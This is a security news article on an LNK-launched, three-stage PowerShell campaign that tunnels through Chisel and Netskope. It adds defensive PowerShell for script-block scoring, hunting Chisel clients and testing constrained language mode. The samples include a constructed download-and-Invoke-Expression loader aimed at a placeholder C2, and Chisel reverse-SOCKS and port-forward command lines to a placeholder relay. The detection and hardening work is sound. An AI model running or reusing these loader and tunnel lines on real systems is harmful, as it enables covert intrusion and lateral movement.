A sophisticated cyberattack uses PowerShell scripts and the open-source tunnelling tool Chisel to infiltrate systems, evade detection and keep long-term, covert control of compromised hosts. The attack starts with an innocuous-looking LNK (Windows shortcut) file that kicks off a multi-stage infection, after which the attackers scan internal networks and set up hidden communication channels.
The newly identified campaign begins with a malicious LNK file that launches a layered, PowerShell-based infection chain. The chain has three stages, designed to establish persistence, communicate with a remote command-and-control (C2) server, and execute additional commands on demand.
This layering reflects a methodical approach aimed at long-term control of the targeted systems.
The attack’s multi-stage nature allows each step to function independently while supporting subsequent stages:

- Stage 1: The initial PowerShell script, launched by the LNK file, establishes a hidden foothold on the system. It sets up the encrypted channel to the C2 server, gathers system data, and stores obfuscated details that later stages use to communicate with the C2 server.
- Stage 2: The second script enhances the attacker’s control by creating additional connections to the C2 server. It downloads further scripts that continue the infection chain and builds on the attacker’s initial access.
- Stage 3: The third and final PowerShell script includes commands to maintain remote access. It continuously interacts with the C2 server, executing commands as directed by the threat actor.

During each infection stage, the PowerShell scripts talk to the C2 server through several layers of obfuscation: they force TLS 1.2 connections, Base64-encode the data they send and receive, and set authorisation headers so that the traffic resembles legitimate web API calls.
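The three stages and their C2 habits described above give defenders a behavioural signature that survives renaming of the scripts. The following is an added example, not code from the article or from the campaign: a heuristic triage of PowerShell script block logs (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) for the traits the article attributes to the loader stages (forcing TLS 1.2, Base64 handling, hand-set Authorization headers, and a download followed by execution). The regexes are illustrative heuristics, the `$Samples` script blocks are constructed here and are not real captures, and `intranet.example` is a placeholder host.

```powershell
# Added example, not from the article or the campaign. Requires script block logging, enabled
# via GPO or HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
# (EnableScriptBlockLogging = 1). Sample script blocks below are constructed, not real captures.

# One regex per behaviour the article names; each category counts once towards the score.
$Indicators = @{
    ForcesTls12         = 'ServicePointManager\]::SecurityProtocol|SecurityProtocolType\]::Tls12'
    Base64Handling      = '\[(System\.)?Convert\]::(From|To)Base64String|-EncodedCommand\b'
    HandSetAuthHeader   = '\bAuthorization\b|\.Headers\.Add\('
    # a download cradle whose result is then executed, matched across line breaks
    DownloadThenExecute = '(DownloadString|Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient)[\s\S]*?(Invoke-Expression|\biex\b)'
}

function Get-ScriptBlockScore {
    param(
        [Parameter(Mandatory)][string]$Text,
        [string]$Name = '(unnamed)',
        [int]$Threshold = 3   # one or two hits are routine in admin scripts; tune per estate
    )
    $hits = foreach ($key in $Indicators.Keys) {
        if ($Text -match $Indicators[$key]) { $key }   # -match is case-insensitive by default
    }
    $hits = @($hits | Sort-Object)
    [pscustomobject]@{
        Name       = $Name
        Score      = $hits.Count
        Indicators = $hits -join ','
        Suspicious = $hits.Count -ge $Threshold
    }
}

function Get-LoggedScriptBlocks {
    # Pulls live 4104 events; Properties[2] is the ScriptBlockText field of that event.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents |
        ForEach-Object { [pscustomobject]@{ Name = $_.TimeCreated.ToString('o'); Text = [string]$_.Properties[2].Value } }
}

# Constructed samples: one combining the loader traits, one ordinary admin call against a placeholder host.
$Samples = @(
    [pscustomobject]@{ Name = 'constructed-loader'; Text = @'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$k = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($blob))
$r = Invoke-RestMethod -Uri $c2 -Headers @{ Authorization = "Bearer $k" }
Invoke-Expression $r
'@ }
    [pscustomobject]@{ Name = 'constructed-admin'; Text = @'
$status = Invoke-RestMethod -Uri 'https://intranet.example/api/health'
Write-Output $status.ok
'@ }
)

$Samples | ForEach-Object { Get-ScriptBlockScore -Text $_.Text -Name $_.Name } | Format-Table -AutoSize

# On a live host:
# Get-LoggedScriptBlocks | ForEach-Object { Get-ScriptBlockScore -Text $_.Text -Name $_.Name } | Where-Object Suspicious
```

The constructed loader block trips all four categories while the admin block trips none, which is the point of scoring by category rather than by single keyword: `Invoke-RestMethod` or a Base64 decode on its own is everyday administration, the combination is not. Long script blocks are logged in several 4104 fragments, so for live data consider joining fragments that share a ScriptBlockId before scoring.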
A particularly revealing element of the attack is the use of Chisel, an open-source tunnelling tool that carries TCP connections inside HTTP(S) sessions, letting attackers open encrypted channels out through firewalls and reach protected internal networks. Using Chisel, the threat actors can pivot within compromised environments, scan internal networks, and reach otherwise isolated systems through a SOCKS proxy, all while avoiding detection.
Researchers noted that the threat actors relay the tunnelled data through Netskope, a cloud security proxy, over encrypted channels, further obscuring the malicious traffic. The combination of Chisel and Netskope lets the threat actors evade traditional network defences, making it difficult for security teams to intercept or block the malicious data flow.
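Because a tunnelling client can be renamed to anything, hunting for Chisel by binary name alone misses most real deployments. The following is an added example, not code from the article: it flags processes by Chisel's client command-line grammar (a `client` subcommand followed by a server URL and remotes such as `R:socks`, `socks` or `R:<port>:<host>:<port>`, plus the `--fingerprint`/`--auth` client flags). The `$Processes` list is constructed, `relay.example.test` and `update.exe` are placeholders, and the fingerprint value is a dummy.

```powershell
# Added example, not from the article. Hunts for Chisel-style tunnel clients by command-line
# grammar rather than binary name. The process list is constructed; on a live host replace it
# with Get-CimInstance Win32_Process (which exposes ProcessId, Name and CommandLine).

$ChiselSigns = [ordered]@{
    ReverseSocks   = '(^|\s)R:socks(\s|$)'   # reverse SOCKS: server gets a SOCKS listener into the victim network
    ForwardSocks   = '(^|\s)socks(\s|$)'     # local SOCKS listener on the client
    ReversePort    = '(^|\s)R:\d{1,5}:'      # reverse port forward, e.g. R:3389:10.0.0.5:3389
    ClientFlags    = '--fingerprint\s|--auth\s|--keepalive\s'
}

function Test-ChiselClient {
    param([Parameter(Mandatory)]$Process)   # any object with ProcessId, Name and CommandLine
    $cmd = [string]$Process.CommandLine
    $reasons = @()
    if ($Process.Name -match '^chisel') { $reasons += 'BinaryName' }
    # Remotes only mean something after the "client" subcommand; this also keeps "ssh -R" out.
    if ($cmd -match '(^|\s)client\s') {
        foreach ($k in $ChiselSigns.Keys) {
            if ($cmd -match $ChiselSigns[$k]) { $reasons += $k }
        }
    }
    [pscustomobject]@{
        ProcessId = $Process.ProcessId
        Name      = $Process.Name
        Reasons   = $reasons -join ','
        Flag      = $reasons.Count -gt 0
    }
}

# Constructed process records; hosts, paths and the fingerprint are placeholders.
$Processes = @(
    [pscustomobject]@{ ProcessId = 4120; Name = 'svchost.exe'; CommandLine = 'C:\Windows\System32\svchost.exe -k netsvcs -p' }
    [pscustomobject]@{ ProcessId = 6688; Name = 'update.exe';  CommandLine = 'C:\Users\Public\update.exe client --fingerprint AAAA= https://relay.example.test:443 R:socks' }
    [pscustomobject]@{ ProcessId = 7012; Name = 'ssh.exe';     CommandLine = 'ssh -R 8080:localhost:80 user@bastion.example' }
    [pscustomobject]@{ ProcessId = 7330; Name = 'chisel.exe';  CommandLine = 'chisel.exe client https://relay.example.test:443 R:3389:10.0.0.5:3389' }
)

$Processes | ForEach-Object { Test-ChiselClient -Process $_ } | Format-Table -AutoSize

# Live hunt:
# Get-CimInstance Win32_Process | ForEach-Object { Test-ChiselClient -Process $_ } | Where-Object Flag
```

In the constructed list the renamed `update.exe` is caught on its `R:socks` remote and `--fingerprint` flag, `chisel.exe` on its name and reverse port forward, while the SSH reverse forward and svchost are left alone. Command-line hunting is a complement to, not a replacement for, watching egress: a Chisel client relayed through a cloud proxy looks like ordinary HTTPS on the wire, so long-lived WebSocket sessions to an unexpected destination deserve the same attention.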
Cybersecurity experts have urged organisations to deploy antivirus software, restrict PowerShell use to personnel who need it, enforce PowerShell's constrained language mode, and monitor network traffic for tunnelling tools such as Chisel.
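Constrained language mode is often recommended as a blanket fix, so it is worth seeing exactly which of the loader's primitives it removes and which it leaves. The following is an added example, not code from the article: it runs a small probe twice in a child PowerShell, once normally and once with the `__PSLockdownPolicy=4` debugging variable set, which starts the child in ConstrainedLanguage. That variable is a test aid only and can be cleared by the very script it is meant to restrain; in production the mode is enforced through a WDAC or AppLocker policy. The probe body and its `aGVsbG8=` test string are constructed for this example; it assumes a Windows host with `powershell.exe` or `pwsh.exe` on the PATH.

```powershell
# Added example, not from the article. Windows only. Shows what Constrained Language Mode blocks
# (direct .NET calls such as ServicePointManager and WebClient) and what it leaves alone (core
# types such as System.Convert, and cmdlets such as Invoke-RestMethod).

$Probe = @'
$r = @{ Mode = [string]$ExecutionContext.SessionState.LanguageMode }
# Primitive 1: pin the process to TLS 1.2, as a loader does before contacting its C2.
try { [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; $r['SetTls12'] = 'allowed' }
catch { $r['SetTls12'] = 'blocked' }
# Primitive 2: raw .NET HTTP client object.
try { $null = New-Object System.Net.WebClient -ErrorAction Stop; $r['NewWebClient'] = 'allowed' }
catch { $r['NewWebClient'] = 'blocked' }
# Primitive 3: Base64 decode via System.Convert, a core type (test string is constructed).
try { $null = [System.Convert]::FromBase64String('aGVsbG8='); $r['Base64Decode'] = 'allowed' }
catch { $r['Base64Decode'] = 'blocked' }
# Primitive 4: cmdlet-based HTTP with custom headers stays available in every language mode.
$r['CmdletHttp'] = if (Get-Command Invoke-RestMethod -ErrorAction SilentlyContinue) { 'allowed' } else { 'missing' }
$r.GetEnumerator() | Sort-Object Name | ForEach-Object { "$($_.Name)=$($_.Value)" }
'@

function Invoke-Probe {
    param([bool]$Constrained)
    # Use the same edition as the current host so the comparison is like for like.
    $exe = if ($PSVersionTable.PSEdition -eq 'Core') { 'pwsh' } else { 'powershell' }
    # -EncodedCommand takes Base64 of the UTF-16LE script text, the same encoding loaders use.
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Probe))
    if ($Constrained) { $env:__PSLockdownPolicy = '4' }
    try   { & $exe -NoProfile -NonInteractive -EncodedCommand $encoded }
    finally { Remove-Item Env:\__PSLockdownPolicy -ErrorAction SilentlyContinue }
}

'--- child started normally ---'
Invoke-Probe -Constrained $false
'--- child started with __PSLockdownPolicy=4 ---'
Invoke-Probe -Constrained $true
```

Read the two result sets side by side: the constrained child reports ConstrainedLanguage and the TLS and WebClient lines flip to blocked, while the Base64 decode and the cmdlet line do not change, because System.Convert is an allowed core type and cmdlets are never restricted by language mode. The practical consequence is that constrained language mode breaks the loader's .NET-heavy tradecraft but a rewrite on top of `Invoke-RestMethod -Headers` would still run, which is why the article's other recommendations, restricting who can run PowerShell at all and watching the network, belong alongside it.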